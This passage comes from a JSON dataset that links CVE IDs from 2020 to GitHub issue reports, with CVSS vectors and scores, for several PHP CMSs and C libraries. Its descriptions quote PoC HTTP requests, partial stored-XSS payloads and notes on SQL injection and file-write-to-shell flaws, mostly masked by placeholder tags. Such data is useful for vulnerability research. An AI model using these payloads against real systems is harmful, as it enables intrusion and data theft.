  49616. "description": "Z APITAG NUMBERTAG Open redirect vulnerability. Z APITAG NUMBERTAG has an Open Redirect via the FILETAG redirect parameter. Open Redirection vulnerability Technical details: URL : FILETAG Parameter Name : redirect Parameter Type : GET Attack Pattern : FILETAG Should there be anything else we can help you with, please do not hesitate to ask.",
  49617. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49618. "severity": "MEDIUM",
  49619. "baseScore": 6.1,
  49620. "impactScore": 2.7,
  49621. "exploitabilityScore": 2.8
  49622. },
  49623. {
  49624. "CVE_ID": "CVE-2020-18392",
  49625. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/106",
  49626. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/106",
  49627. "Repo_new": "cesanta/mjs",
  49628. "Issue_Created_At": "2018-07-03T06:21:09Z",
  49629. "description": "APITAG stack overflow at APITAG POCs: FILETAG FILETAG ASAN output: ERRORTAG",
  49630. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  49631. "severity": "MEDIUM",
  49632. "baseScore": 5.5,
  49633. "impactScore": 3.6,
  49634. "exploitabilityScore": 1.8
  49635. },
  49636. {
  49637. "CVE_ID": "CVE-2020-18428",
  49638. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/109",
  49639. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/109",
  49640. "Repo_new": "syoyo/tinyexr",
  49641. "Issue_Created_At": "2019-03-05T02:30:27Z",
  49642. "description": "Out of range in function APITAG APITAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), an out-of-range access has been triggered. (gdb) bt NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff6aba NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff7ad NUMBERTAG b7 in ?? () from PATHTAG NUMBERTAG ffff7adea NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff7adea NUMBERTAG in APITAG () from PATHTAG NUMBERTAG ffff7adec NUMBERTAG in __cxa_throw () from PATHTAG NUMBERTAG ffff7ada7b5 in ?? () from PATHTAG NUMBERTAG df NUMBERTAG in std::vector<float, std::allocator APITAG >::_M_range_check (this=<optimized out>, __n NUMBERTAG at PATHTAG NUMBERTAG std::vector<float, std::allocator APITAG >::at (this=<optimized out>, __n NUMBERTAG at PATHTAG NUMBERTAG APITAG (data=<optimized out>, width NUMBERTAG height NUMBERTAG components NUMBERTAG save_as_fp NUMBERTAG outfilename NUMBERTAG f NUMBERTAG e0 APITAG APITAG err=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG c in main (argc=<optimized out>, argv=<optimized out>) at APITAG",
  49643. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  49644. "severity": "HIGH",
  49645. "baseScore": 7.5,
  49646. "impactScore": 3.6,
  49647. "exploitabilityScore": 3.9
  49648. },
  49649. {
  49650. "CVE_ID": "CVE-2020-18430",
  49651. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/108",
  49652. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/108",
  49653. "Repo_new": "syoyo/tinyexr",
  49654. "Issue_Created_At": "2019-03-05T02:30:06Z",
  49655. "description": "Out of memory in function APITAG APITAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a out of memory has triggered NUMBERTAG ERROR: APITAG allocator is out of memory trying to allocate NUMBERTAG f NUMBERTAG b NUMBERTAG bytes NUMBERTAG f2bb2 in operator new(unsigned long) ( PATHTAG NUMBERTAG a in APITAG long>::allocate(unsigned long, void const ) PATHTAG NUMBERTAG a in APITAG long> APITAG long>&, unsigned long) PATHTAG NUMBERTAG a in APITAG long, std::allocator<unsigned long> >::_M_allocate(unsigned long) PATHTAG NUMBERTAG a in APITAG long, std::allocator<unsigned long> >::_M_create_storage(unsigned long) PATHTAG NUMBERTAG a in APITAG long, std::allocator<unsigned long> APITAG long, std::allocator<unsigned long> const&) PATHTAG NUMBERTAG a in std::vector<unsigned long, std::allocator<unsigned long> >::vector(unsigned long, std::allocator<unsigned long> const&) PATHTAG NUMBERTAG a in APITAG , APITAG const , unsigned char const , unsigned char const , unsigned long, char const ) PATHTAG NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG e in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG ee NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG fb NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG HINT: if you don't care about these errors you may set allocator_may_return_null NUMBERTAG SUMMARY: APITAG out of memory ( PATHTAG ) in operator new(unsigned long NUMBERTAG ABORTING",
  49656. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  49657. "severity": "HIGH",
  49658. "baseScore": 7.5,
  49659. "impactScore": 3.6,
  49660. "exploitabilityScore": 3.9
  49661. },
  49662. {
  49663. "CVE_ID": "CVE-2020-18438",
  49664. "Issue_Url_old": "https://github.com/qinggan/phpok/issues/4",
  49665. "Issue_Url_new": "https://github.com/qinggan/phpok/issues/4",
  49666. "Repo_new": "qinggan/phpok",
  49667. "Issue_Created_At": "2019-03-06T06:25:51Z",
  49668. "description": "phpok NUMBERTAG have Some Vulnerability. Variable Overwrite Vulnerability from the Entrance of framework\uff0ci discovered APITAG variable overwrite in APITAG APITAG APITAG we could watch APITAG parameter in APITAG \uff1a APITAG APITAG payload\uff1a APITAG APITAG APITAG Vulnerability to read arbitrary files APITAG APITAG back to the: PATHTAG APITAG APITAG PATHTAG APITAG APITAG there is two file have this vulnerability: payload1: APITAG payload2: APITAG APITAG APITAG APITAG APITAG Arbitrary File Writing to getshell APITAG function In APITAG NUMBERTAG line APITAG APITAG payload: APITAG APITAG APITAG Arbitrary file delete Vulnerability PATHTAG NUMBERTAG APITAG \u51fd\u6570\uff1a APITAG APITAG payload: APITAG APITAG APITAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG",
  49669. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49670. "severity": "HIGH",
  49671. "baseScore": 7.5,
  49672. "impactScore": 3.6,
  49673. "exploitabilityScore": 3.9
  49674. },
  49675. {
  49676. "CVE_ID": "CVE-2020-18442",
  49677. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/68",
  49678. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/68",
  49679. "Repo_new": "gdraheim/zziplib",
  49680. "Issue_Created_At": "2019-03-05T16:45:19Z",
  49681. "description": "error: Incorrect handling of function 'zzip_fread' return value. Hello, I found a bug of zziplib on the latest commit b NUMBERTAG bc. It's in the function unzzip_cat_file (unzzipcat APITAG , and it is caused by incorrect handling of the return value of the function \u2018zzip_fread\u2019. Relevant code in function unzzip_cat_file in unzzipcat zip.c: ERRORTAG FILETAG Using the POC file, I find that the function zzip_file_read returns NUMBERTAG And it is handled incorrectly in the caller (unzzip_cat_file), which leads to an infinite loop. ERRORTAG",
  49682. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  49683. "severity": "LOW",
  49684. "baseScore": 3.3,
  49685. "impactScore": 1.4,
  49686. "exploitabilityScore": 1.8
  49687. },
  49688. {
  49689. "CVE_ID": "CVE-2020-18445",
  49690. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/8",
  49691. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/8",
  49692. "Repo_new": "doublefast/yunucms",
  49693. "Issue_Created_At": "2019-03-06T08:10:47Z",
  49694. "description": "APITAG Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG \" In the PATHTAG No filtering to id in the upurl( ) function: FILETAG Steps To Reproduce: Open below URL in browser which supports flash. url: URLTAG FILETAG Fix: Filter the url parameter",
  49695. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49696. "severity": "MEDIUM",
  49697. "baseScore": 6.1,
  49698. "impactScore": 2.7,
  49699. "exploitabilityScore": 2.8
  49700. },
  49701. {
  49702. "CVE_ID": "CVE-2020-18446",
  49703. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/9",
  49704. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/9",
  49705. "Repo_new": "doublefast/yunucms",
  49706. "Issue_Created_At": "2019-03-07T05:39:20Z",
  49707. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG \" In the PATHTAG filtering to param in the APITAG ) function: FILETAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG content FILETAG APITAG refresh vulnerability trigger point FILETAG Fix: Filter the param parameter",
  49708. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49709. "severity": "MEDIUM",
  49710. "baseScore": 4.8,
  49711. "impactScore": 2.7,
  49712. "exploitabilityScore": 1.7
  49713. },
  49714. {
  49715. "CVE_ID": "CVE-2020-18451",
  49716. "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/2",
  49717. "Issue_Url_new": "https://github.com/autismjh/damicms/issues/2",
  49718. "Repo_new": "autismjh/damicms",
  49719. "Issue_Created_At": "2019-03-13T02:09:44Z",
  49720. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG No filtering to title in the APITAG function: FILETAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG content FILETAG FILETAG APITAG refresh vulnerability trigger point FILETAG Fix: Filter the title parameter.",
  49721. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49722. "severity": "MEDIUM",
  49723. "baseScore": 4.8,
  49724. "impactScore": 2.7,
  49725. "exploitabilityScore": 1.7
  49726. },
  49727. {
  49728. "CVE_ID": "CVE-2020-18454",
  49729. "Issue_Url_old": "https://github.com/hillerlin/bycms/issues/1",
  49730. "Issue_Url_new": "https://github.com/hillerlin/bycms/issues/1",
  49731. "Repo_new": "hillerlin/bycms",
  49732. "Issue_Created_At": "2019-03-13T09:08:37Z",
  49733. "description": "Bug NUMBERTAG Cross site request forgery. There is an Stored Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: FILETAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG APITAG page has changed FILETAG",
  49734. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  49735. "severity": "MEDIUM",
  49736. "baseScore": 6.8,
  49737. "impactScore": 5.9,
  49738. "exploitabilityScore": 0.9
  49739. },
  49740. {
  49741. "CVE_ID": "CVE-2020-18455",
  49742. "Issue_Url_old": "https://github.com/hillerlin/bycms/issues/2",
  49743. "Issue_Url_new": "https://github.com/hillerlin/bycms/issues/2",
  49744. "Repo_new": "hillerlin/bycms",
  49745. "Issue_Created_At": "2019-03-21T06:55:11Z",
  49746. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG No filtering to title in the edit( ) function: FILETAG Vulnerability trigger point FILETAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG FILETAG APITAG content FILETAG APITAG the refresh vulnerability trigger point FILETAG Fix: Filter the title parameter",
  49747. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49748. "severity": "MEDIUM",
  49749. "baseScore": 4.8,
  49750. "impactScore": 2.7,
  49751. "exploitabilityScore": 1.7
  49752. },
  49753. {
  49754. "CVE_ID": "CVE-2020-18456",
  49755. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/4",
  49756. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/4",
  49757. "Repo_new": "pbootcms/pbootcms",
  49758. "Issue_Created_At": "2019-04-09T01:42:25Z",
  49759. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG No filtering to title in the mod( ) function: FILETAG FILETAG Vulnerability trigger point\uff1a URLTAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG NUMBERTAG modify content FILETAG FILETAG APITAG refresh vulnerability trigger point FILETAG Fix: Filter the title parameter",
  49760. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49761. "severity": "MEDIUM",
  49762. "baseScore": 4.8,
  49763. "impactScore": 2.7,
  49764. "exploitabilityScore": 1.7
  49765. },
  49766. {
  49767. "CVE_ID": "CVE-2020-18457",
  49768. "Issue_Url_old": "https://github.com/hillerlin/bycms/issues/3",
  49769. "Issue_Url_new": "https://github.com/hillerlin/bycms/issues/3",
  49770. "Repo_new": "hillerlin/bycms",
  49771. "Issue_Created_At": "2019-04-10T02:43:41Z",
  49772. "description": "Bug NUMBERTAG Cross site request forgery. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: FILETAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG FILETAG APITAG page has changed FILETAG",
  49773. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  49774. "severity": "MEDIUM",
  49775. "baseScore": 6.8,
  49776. "impactScore": 5.9,
  49777. "exploitabilityScore": 0.9
  49778. },
  49779. {
  49780. "CVE_ID": "CVE-2020-18458",
  49781. "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/5",
  49782. "Issue_Url_new": "https://github.com/autismjh/damicms/issues/5",
  49783. "Repo_new": "autismjh/damicms",
  49784. "Issue_Created_At": "2019-04-15T08:36:56Z",
  49785. "description": "Bug NUMBERTAG Cross site request forgery. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG FILETAG",
  49786. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  49787. "severity": "HIGH",
  49788. "baseScore": 8.0,
  49789. "impactScore": 5.9,
  49790. "exploitabilityScore": 2.1
  49791. },
  49792. {
  49793. "CVE_ID": "CVE-2020-18462",
  49794. "Issue_Url_old": "https://github.com/Richard1266/aikcms/issues/1",
  49795. "Issue_Url_new": "https://github.com/richard1266/aikcms/issues/1",
  49796. "Repo_new": "richard1266/aikcms",
  49797. "Issue_Created_At": "2019-04-29T06:40:30Z",
  49798. "description": "Bug NUMBERTAG File upload vulnerability. There is an File upload vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG checksum filtering of file extensions of uploaded files\uff1a FILETAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG and capture the change suffix name FILETAG FILETAG FILETAG APITAG FILETAG",
  49799. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  49800. "severity": "HIGH",
  49801. "baseScore": 7.2,
  49802. "impactScore": 5.9,
  49803. "exploitabilityScore": 1.2
  49804. },
  49805. {
  49806. "CVE_ID": "CVE-2020-18463",
  49807. "Issue_Url_old": "https://github.com/Richard1266/aikcms/issues/2",
  49808. "Issue_Url_new": "https://github.com/richard1266/aikcms/issues/2",
  49809. "Repo_new": "richard1266/aikcms",
  49810. "Issue_Created_At": "2019-04-29T07:07:17Z",
  49811. "description": "Bug NUMBERTAG Cross site request forgery. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: FILETAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG FILETAG APITAG page has changed FILETAG",
  49812. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
  49813. "severity": "LOW",
  49814. "baseScore": 2.4,
  49815. "impactScore": 1.4,
  49816. "exploitabilityScore": 0.9
  49817. },
  49818. {
  49819. "CVE_ID": "CVE-2020-18467",
  49820. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/364",
  49821. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/364",
  49822. "Repo_new": "bigtreecms/bigtree-cms",
  49823. "Issue_Created_At": "2019-04-09T10:02:27Z",
  49824. "description": "APITAG CMS NUMBERTAG There is a a Stored XSS which can allows remote attackers to inject arbitrary code. APITAG CMS version NUMBERTAG suffers from a cross site scripting vulnerability. After the administrator logged in, Add Tag which can allows remote attackers to inject arbitrary code NUMBERTAG poc: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG bigtree_admin FILETAG NUMBERTAG when administrator access Tags FILETAG",
  49825. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49826. "severity": "MEDIUM",
  49827. "baseScore": 5.4,
  49828. "impactScore": 2.7,
  49829. "exploitabilityScore": 2.3
  49830. },
  49831. {
  49832. "CVE_ID": "CVE-2020-18468",
  49833. "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/2",
  49834. "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/2",
  49835. "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
  49836. "Issue_Created_At": "2019-04-12T07:54:24Z",
  49837. "description": "Persistent XSS on APITAG NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG field found in the APITAG Page\" page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG APITAG administrator loggin POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"type\" login NUMBERTAG Content Disposition: form data; name=\"cfg FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  49838. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49839. "severity": "MEDIUM",
  49840. "baseScore": 5.4,
  49841. "impactScore": 2.7,
  49842. "exploitabilityScore": 2.3
  49843. },
  49844. {
  49845. "CVE_ID": "CVE-2020-18469",
  49846. "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/3",
  49847. "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/3",
  49848. "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
  49849. "Issue_Created_At": "2019-04-12T09:34:42Z",
  49850. "description": "Persistent XSS on Rukovoditel NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG of application\" field found in the APITAG Configuration\" page in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG of application\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG When an unauthenticated user visits the page, the code gets executed: FILETAG NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG Text\" field found in the APITAG page under the APITAG menu in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG Text\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"form_session_token\" APITAG NUMBERTAG Content Disposition: form data; name=\"CFG FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  49851. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49852. "severity": "MEDIUM",
  49853. "baseScore": 5.4,
  49854. "impactScore": 2.7,
  49855. "exploitabilityScore": 2.3
  49856. },
  49857. {
  49858. "CVE_ID": "CVE-2020-18469",
  49859. "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/5",
  49860. "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/5",
  49861. "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
  49862. "Issue_Created_At": "2019-04-12T14:40:19Z",
  49863. "description": "Persistent XSS on Rukovoditel NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG Text\" field found in the APITAG page under the APITAG menu in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG Text\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"form_session_token\" APITAG NUMBERTAG Content Disposition: form data; name=\"CFG FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  49864. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49865. "severity": "MEDIUM",
  49866. "baseScore": 5.4,
  49867. "impactScore": 2.7,
  49868. "exploitabilityScore": 2.3
  49869. },
  49870. {
  49871. "CVE_ID": "CVE-2020-18470",
  49872. "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/4",
  49873. "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/4",
  49874. "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
  49875. "Issue_Created_At": "2019-04-12T14:32:58Z",
  49876. "description": "Persistent XSS on Rukovoditel NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG of application\" field found in the APITAG Configuration\" page in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG of application\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG When an unauthenticated user visits the page, the code gets executed: FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  49877. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49878. "severity": "MEDIUM",
  49879. "baseScore": 5.4,
  49880. "impactScore": 2.7,
  49881. "exploitabilityScore": 2.3
  49882. },
  49883. {
  49884. "CVE_ID": "CVE-2020-18475",
  49885. "Issue_Url_old": "https://github.com/joelister/bug/issues/7",
  49886. "Issue_Url_new": "https://github.com/joelister/bug/issues/7",
  49887. "Repo_new": "joelister/bug",
  49888. "Issue_Created_At": "2019-04-30T09:27:01Z",
  49889. "description": "Persistent XSS on 'mes_title' field. APITAG first user inserts a malicious script into the header field of the outbox and sends it to other users. FILETAG APITAG other users open the email, the malicious code will be executed. FILETAG NUMBERTAG exp code\uff1a POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG",
  49890. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49891. "severity": "MEDIUM",
  49892. "baseScore": 5.4,
  49893. "impactScore": 2.7,
  49894. "exploitabilityScore": 2.3
  49895. },
  49896. {
  49897. "CVE_ID": "CVE-2020-18476",
  49898. "Issue_Url_old": "https://github.com/joelister/bug/issues/9",
  49899. "Issue_Url_new": "https://github.com/joelister/bug/issues/9",
  49900. "Repo_new": "joelister/bug",
  49901. "Issue_Created_At": "2019-04-30T09:57:02Z",
  49902. "description": "SQL injection vulnerability in the \u201ccon_content\u201d field of Hucart cms NUMBERTAG After the user logs in, Hucart cms NUMBERTAG does not securely filter the avatar \"usd_image\" field in the basic information, resulting in a SQL injection vulnerability. FILETAG APITAG current page capture is as follows: POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"usd_nick NUMBERTAG Content Disposition: form data; name=\"usd_image NUMBERTAG Content Disposition: form data; name=\"usd_truename NUMBERTAG Content Disposition: form data; name=\"usd_birthday NUMBERTAG Content Disposition: form data; name=\"usd_salt NUMBERTAG Content Disposition: form data; name=\"usd_msn\" EMAILTAG NUMBERTAG Content Disposition: form data; name=\"usd_qq NUMBERTAG Content Disposition: form data; name=\"usd_officephone NUMBERTAG Content Disposition: form data; name=\"usd_homephone NUMBERTAG Content Disposition: form data; name=\"usd_tel NUMBERTAG Content 